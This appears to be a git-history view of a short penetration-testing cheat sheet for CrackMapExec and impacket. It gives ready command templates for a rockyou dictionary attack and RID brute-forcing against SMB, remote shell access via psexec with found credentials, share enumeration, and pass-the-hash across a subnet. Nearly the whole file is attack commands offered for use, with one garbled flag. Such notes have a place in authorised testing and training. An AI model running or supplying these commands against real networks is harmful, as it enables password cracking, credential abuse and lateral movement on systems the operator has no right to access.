killchain-compendium/Post Exploitation/Windows/CrackMapExec.md

42 lines
757 B
Markdown
Raw Normal View History

2022-11-11 01:15:07 +01:00
# Crackmapexec
2024-01-11 05:40:49 +01:00
## Dictionary attack against SMB
```sh
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
```
## Brute Force attack against SMB
Brute force attack using an anonymous user
```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
2022-11-11 01:15:07 +01:00
```
2024-01-11 05:40:49 +01:00
## Use Found Password
Use the password with `impacket/examples/psexec.py` in the following way
2022-11-11 01:15:07 +01:00
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```
2024-01-11 05:40:49 +01:00
## Enumerate Shares
Check user permissions on shares
2022-11-11 01:15:07 +01:00
2024-01-11 05:40:49 +01:00
```sh
2022-11-11 01:15:07 +01:00
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
```
## SMB
2024-01-11 05:40:49 +01:00
Check user hash on the network via smb
2022-11-11 01:15:07 +01:00
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```